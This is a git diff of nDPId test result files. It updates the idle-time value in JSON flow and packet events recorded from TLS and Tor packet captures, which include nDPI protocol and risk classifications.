+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 
00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","packets-captured":48,"packets-processed":48,"total-skipped-flows":0,"total-l4-data-len":19077,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1578254908551} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 48/48 diff --git a/test/results/tor.pcap.out b/test/results/tor.pcap.out index 3a09c7731..fddc099ed 100644 --- a/test/results/tor.pcap.out +++ b/test/results/tor.pcap.out 
@@ -6,28 +6,28 @@ 00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00177{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":3,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821664212} 00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821665420,"flow_last_seen":1383821665420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821665420,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383821665420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665420,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A15AAIAGe0DAqAH8W49d8semAbvp\/8nSAAAAAIACIABVtgAAAgQFtAEDAwgBAQQC"} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665491,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x6b4Wbj86f\/J04ASOQiLRwAAAgQFtAEBBAIBAwMH"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821665491,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA19AAIAGe0vAqAH8W49d8semAbvp\/8nT+Fm4\/VAQAQAEIgAAAAAAAAAA"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01160{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821665420,"flow_last_seen":1383821665420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821665420,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383821665420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665420,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A15AAIAGe0DAqAH8W49d8semAbvp\/8nSAAAAAIACIABVtgAAAgQFtAEDAwgBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383821665491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665491,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x6b4Wbj86f\/J04ASOQiLRwAAAgQFtAEBBAIBAwMH"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383821665491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821665491,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA19AAIAGe0vAqAH8W49d8semAbvp\/8nT+Fm4\/VAQAQAEIgAAAAAAAAAA"} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01160{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":25,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821666212} 
00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821666164,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821666407,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821666407,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666407,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A2hAAIAG0l3AqAH8Ljs0H8enAbvpjJYYAAAAAIACIADhCQAAAgQFtAEDAwgBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1383821666480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666480,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAACwGKcYuOzQfwKgB\/AG7x6cxNPZ86YyWGYASchBnNQAAAgQFtAEBBAIBAwMK"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1383821666481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821666481,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA2lAAIAG0mjAqAH8Ljs0H8enAbvpjJYZMTT2fVAQAQAZGwAAAAAAAAAA"} -01195{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821666407,"flow_last_seen":1383821666407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821666407,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1383821666407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666407,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A2hAAIAG0l3AqAH8Ljs0H8enAbvpjJYYAAAAAIACIADhCQAAAgQFtAEDAwgBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1383821666480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666480,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAACwGKcYuOzQfwKgB\/AG7x6cxNPZ86YyWGYASchBnNQAAAgQFtAEBBAIBAwMK"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1383821666481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821666481,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA2lAAIAG0mjAqAH8Ljs0H8enAbvpjJYZMTT2fVAQAQAZGwAAAAAAAAAA"} +01195{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version 
(1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":55,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821668212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821668066,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821668403,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821668403,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668403,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A3VAAIAGx5DAqAH8JuVGNceoAbuUs9YxAAAAAIACIADrCAAAAgQFtAEDAwgBAQQC"} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1383821668547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668547,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x6iEDREglLPWMoASOQg8wAAAAgQFtAEBBAIBAwMK"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821668548,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA3ZAAIAGx5vAqAH8JuVGNceoAbuUs9YyhA0RIVAQAQC1nQAAAAAAAAAA"} -01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 
